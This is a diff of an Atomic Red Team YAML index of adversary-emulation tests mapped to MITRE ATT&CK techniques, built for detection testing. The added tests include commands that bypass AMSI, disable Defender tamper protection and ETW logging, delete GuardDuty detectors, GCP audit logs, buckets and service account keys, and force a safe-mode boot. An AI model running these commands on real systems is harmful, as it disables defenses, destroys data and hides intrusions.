      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32712,7 +32886,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32752,6 +32926,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -38447,7 +38622,81 @@ persistence:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1098
-    atomic_tests: []
+    atomic_tests:
+    - name: GCP - Delete Service Account Key
+      auto_generated_guid: 7ece1dea-49f1-4d62-bdcc-5801e3292510
+      description: "This Atomic will: \n  - Create a service account\n  - Create a
+        service account key, \n  - Store the result of retrieving a single key for
+        that service account as a variable\n  - Pass that variable for deletion\n
+        \ - Delete the service account\n\nThe idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies the deletion of an Identity and
+        Access Management (IAM) service account key in Google Cloud Platform (GCP).\nEach
+        service account is associated with two sets of public/private RSA key pairs
+        that are used to authenticate. \nIf a key is deleted, the application will
+        no longer be able to access Google Cloud resources using that key. A security
+        best practice is to rotate your service account keys regularly.\n\nReference:
+        https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project_id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        service_name:
+          description: The name of the service account.
+          type: string
+          default: atomic-service-account
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project_id}
+          KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
+          gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
+        cleanup_command: |
+          cd $PathToAtomicsFolder/T1098/src/T1098-17/
+          terraform state rm google_service_account_key.key
+          terraform destroy -auto-approve
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install the terraform.
+
+          '
+      - description: 'Create dependency resources using terraform
+
+          '
+        prereq_command: 'stat $PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate
+
+          '
+        get_prereq_command: |-
+          cd $PathToAtomicsFolder/T1098/src/T1098-17/
+          terraform init
+          terraform apply -auto-approve
  T1547.006:
    technique:
      x_mitre_platforms:
@@ -41703,7 +41952,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41724,6 +41973,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -42137,7 +42387,6 @@ persistence:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -42157,6 +42406,72 @@ persistence:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1053.002:
    technique:
@@ -49479,6 +49794,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -65265,7 +65581,76 @@ impact:
      - SYSTEM
      x_mitre_is_subtechnique: false
      identifier: T1485
-    atomic_tests: []
+    atomic_tests:
+    - name: GCP - Delete Bucket
+      auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928
+      description: |
+        This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
+
+        Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
+        This atomic will create a bucket then delete the bucket.
+
+        Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project_id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        bucket_name:
+          description: The name of the bucket to delete.
+          type: string
+          default: atomic-red-team-bucket
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project_id}
+          gcloud storage buckets delete gs://#{bucket_name}
+        cleanup_command: |
+          cd $PathToAtomicsFolder/T1485/src/T1485-4/
+          terraform state rm google_storage_bucket.bucket
+          terraform destroy -auto-approve
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install the terraform.
+
+          '
+      - description: 'Create dependency resources using terraform
+
+          '
+        prereq_command: 'stat $PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate
+
+          '
+        get_prereq_command: |-
+          cd $PathToAtomicsFolder/T1485/src/T1485-4/
+          terraform init
+          terraform apply -auto-approve
  T1498:
    technique:
      x_mitre_platforms:
@@ -67122,7 +67507,6 @@ initial-access:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -67142,6 +67526,72 @@ initial-access:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1566.003:
    technique:
@@ -3252,7 +3252,7 @@ defense-evasion:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -3981,6 +3981,49 @@ defense-evasion:
          sc.exe delete #{service_name}
        name: command_prompt
        elevation_required: true
+    - name: Command Execution with NirCmd
+      auto_generated_guid: 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be
+      description: |
+        NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
+        See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
+      supported_platforms:
+      - windows
+      input_arguments:
+        nircmd_location:
+          description: Location of nircmd executable
+          type: Path
+          default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
+        command_to_execute:
+          description: Command for nircmd to execute
+          type: Path
+          default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
+        cleanup_command_to_execute:
+          description: Cleanup command to undo the arbitrary command ran by nircmd
+          type: Path
+          default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Nircmd executable must exist at (#{nircmd_location})
+
+          '
+        prereq_command: 'if (Test-Path #{nircmd_location}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://www.nirsoft.net/utils/nircmd-x64.zip\"
+          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" \nexpand-archive
+          -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" -destinationpath
+          PathToAtomicsFolder\\..\\ExternalPayloads\\\n"
+      executor:
+        command: 'cmd /c #{nircmd_location} #{command_to_execute}
+
+          '
+        cleanup_command: 'cmd /c #{nircmd_location} #{cleanup_command_to_execute}
+          -erroraction silentlycontinue | out-null
+
+          '
+        name: powershell
+        elevation_required: false
  T1484.002:
    technique:
      modified: '2022-10-21T16:09:14.555Z'
@@ -4282,7 +4325,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -4309,7 +4352,19 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
-    atomic_tests: []
+      identifier: T1562.009
+    atomic_tests:
+    - name: Safe Mode Boot
+      auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
+      description: Allows adversaries to abuse safe mode to disable endpoint defenses
+        that may not start with limited boot
+      supported_platforms:
+      - windows
+      executor:
+        command: bcdedit /set safeboot network
+        cleanup_command: bcdedit /deletevalue {current} safeboot
+        name: command_prompt
+        elevation_required: true
  T1542.005:
    technique:
      x_mitre_platforms:
@@ -8966,6 +9021,35 @@ defense-evasion:
          del %TEMP%\ie4uinit.exe >nul 2>&1
          del %TEMP%\ieuinit.inf >nul 2>&1
        name: command_prompt
+    - name: LOLBAS CustomShellHost to Spawn Process
+      auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
+      description: |
+        This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+        Upon execution, customshellhost.exe will spawn calc.exe.
+        Note this will only work on Windows 10 or 11.
+        [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+        [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest_path:
+          description: Directory to copy files into
+          type: path
+          default: C:\test
+      executor:
+        command: |
+          if (-not (Test-Path #{dest_path})) {
+          New-Item -Path #{dest_path} -ItemType Directory
+          } else {
+          Write-Host "Directory #{dest_path} already exists." }
+          Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+          Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+          #{dest_path}\customshellhost.exe
+        cleanup_command: 'Remove-Item -Path #{dest_path} -Recurse -Force
+
+          '
+        name: powershell
+        elevation_required: true
  T1038:
    technique:
      x_mitre_platforms:
@@ -12111,8 +12195,10 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
-          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 \n"
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
+
+          '
        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
          /v NoPropertiesMyDocuments /f >nul 2>&1

@@ -12584,12 +12670,12 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security
-          Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1
+          Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
          Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d
-          0
+          0 /f

          '
        name: command_prompt
@@ -12604,11 +12690,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoUpdate" /t REG_DWORD /d 1
+          /v "NoAutoUpdate" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoUpdate" /t REG_DWORD /d 0
+          /v "NoAutoUpdate" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -12623,11 +12709,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1
+          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0
+          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -12642,11 +12728,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "AUOptions" /t REG_DWORD /d 2
+          /v "AUOptions" /t REG_DWORD /d 2 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "AUOptions" /t REG_DWORD /d 3
+          /v "AUOptions" /t REG_DWORD /d 3 /f

          '
        name: command_prompt
@@ -12661,11 +12747,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
-          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1
+          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
-          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0
+          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -12681,11 +12767,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
-          /t REG_DWORD /d 0
+          /t REG_DWORD /d 0 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features"
-          /v "TamperProtection" /t REG_DWORD /d 5
+          /v "TamperProtection" /t REG_DWORD /d 5 /f

          '
        name: command_prompt
@@ -12711,6 +12797,23 @@ defense-evasion:
          '
        name: powershell
        elevation_required: true
+    - name: Allow Simultaneous Download Registry
+      auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+      description: 'A registry modification to allow Simultaneous download in the
+        system.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+        cleanup_command: |
+          reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+          reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+        name: command_prompt
+        elevation_required: true
  T1574.008:
    technique:
      modified: '2023-03-30T21:01:44.781Z'
@@ -15285,15 +15388,16 @@ defense-evasion:
      description: |
        An adversary can disable the ETW Provider of Windows Defender,
        so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+        https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
      supported_platforms:
      - windows
      executor:
        command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" /v Operational /t REG_DWORD /d 0 /f
+          Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f

          '
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" /v Operational /f >nul 2>&1
+          Defender/Operational" /v Enabled /f >nul 2>&1

          '
        name: command_prompt
@@ -15303,15 +15407,16 @@ defense-evasion:
      description: |
        An adversary can disable the ETW Provider of Windows Defender,
        so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+        https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
      supported_platforms:
      - windows
      executor:
        command: 'New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" -Name Operational  -PropertyType DWord -Value 0 -Force
+          Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force

          '
        cleanup_command: 'Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" -Name Operational -Force -ErrorAction Ignore
+          Defender/Operational" -Name Enabled -Force -ErrorAction Ignore

          '
        name: powershell
@@ -20592,6 +20697,61 @@ defense-evasion:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
        name: powershell
        elevation_required: true
+    - name: AMSI Bypass - Override AMSI via COM
+      auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
+      description: "With administrative rights, an adversary can disable AMSI via
+        registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
+        by overriding the Microsoft Defender COM object for AMSI and points it to
+        a DLL that does not exist.\nThis is currently being used by AsyncRAT and others.
+        \nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /ve /t REG_SZ /d C:\IDontExist.dll /f
+
+          '
+        cleanup_command: 'REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /f
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: AWS - GuardDuty Suspension or Deletion
+      auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e
+      description: 'Enables GuardDuty in AWS, upon successful creation this test will
+        suspend and then delete the GuardDuty configuration.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        region:
+          description: Name of the specified region
+          type: string
+          default: us-east-1
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
+          aws guardduty update-detector --no-enable --detector-id $detectorId
+          aws guardduty delete-detector --detector-id $detectorId
+        cleanup_command: 'echo "If test successfully ran, no cleanup required."
+
+          '
+        name: bash
+        elevation_required: false
  T1601:
    technique:
      x_mitre_platforms:
@@ -24687,6 +24847,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -24813,6 +24974,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -24991,6 +25153,47 @@ defense-evasion:
          Disconnect-ExchangeOnline -Confirm:$false
        name: powershell
        elevation_required: false
+    - name: GCP - Delete Activity Event Log
+      auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
+      description: "GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data
+        Access, System Events, and Policy Denied.\nAn adversary may attempt to delete
+        logs in order to hide their activity. However, Admin Activity, System Events,
+        and Policy Deny events logs cannot be deleted. \n\nThis Atomic attempts to
+        delete the Activity Event log. An event is generated under the method name
+        of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-project-1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1564.003:
    technique:
      x_mitre_platforms:
@@ -28536,7 +28739,6 @@ defense-evasion:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -28556,6 +28758,13 @@ defense-evasion:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
    - name: Azure Persistence Automation Runbook Created or Modified
      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
@@ -28636,6 +28845,65 @@ defense-evasion:
          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
          cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/
          terraform destroy -auto-approve
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
